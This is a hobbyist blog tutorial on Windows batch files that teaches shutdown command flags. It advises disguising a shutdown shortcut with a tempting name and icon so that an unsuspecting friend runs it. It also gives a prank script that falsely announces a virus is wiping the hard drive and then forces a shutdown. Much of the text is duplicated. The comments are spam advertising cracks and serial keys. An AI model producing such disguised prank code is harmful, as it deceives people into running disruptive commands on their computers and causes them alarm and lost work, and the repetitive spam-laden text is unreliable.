Well this is my first tutorial, and it's about .bat files. If you didn't already know, a .bat(or batch file) is just a basic
command code. These codes can be easily written with the use of a notepad file.(you obviously need windows to do this).
-Ok well first off lets get familiar with some commands.
-s <- this shuts down the computer
-r <- this restarts the computer
-l <- this logs off the user
-f <- this forces all programs running to shutdown
-t <- this is the time limit until shutdown (the time is in seconds so -t 60 means 60 seconds until the shutdown commences )
try not to mix -s and -r and -l, only use one at a time, as i cannot guarantee what happens when you mix them.
-Now you're probably like WTF? i don't know how to use this in a batch file.....no ones dumb enough to run it.....
Solution: Create a shortcut on the desktop, and give it a nice icon / name (something a curious friend will open)
In the box where it says location type your shutdown code (the above stuff)
*curious friend opens it* and his computer shuts down
command code. These codes can be easily written with the use of a notepad file.(you obviously need windows to do this).
-Ok well first off lets get familiar with some commands.
-s <- this shuts down the computer
-r <- this restarts the computer
-l <- this logs off the user
-f <- this forces all programs running to shutdown
-t <- this is the time limit until shutdown (the time is in seconds so -t 60 means 60 seconds until the shutdown commences )
try not to mix -s and -r and -l, only use one at a time, as i cannot guarantee what happens when you mix them.
-Now you're probably like WTF? i don't know how to use this in a batch file.....no ones dumb enough to run it.....
Solution: Create a shortcut on the desktop, and give it a nice icon / name (something a curious friend will open)
In the box where it says location type your shutdown code (the above stuff)
*curious friend opens it* and his computer shuts down
Code:
|
@echo off
echo you've been infected with a fun little virus that will now wipe out your hard drive.
echo please wait .........
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo You're soooo f***ed.
echo Hard Drive being wiped out......
pathping localhost -q 2 -p 250 > nul
shutdown -f
|
2 comments:
Download the latest Asphalt Guided
How To Make Batch File ~ Serial Key And Cracks, Hacking Tips, Make Money Online >>>>> Download Now
>>>>> Download Full
How To Make Batch File ~ Serial Key And Cracks, Hacking Tips, Make Money Online >>>>> Download LINK
>>>>> Download Now
How To Make Batch File ~ Serial Key And Cracks, Hacking Tips, Make Money Online >>>>> Download Full
>>>>> Download LINK Eb
Post a Comment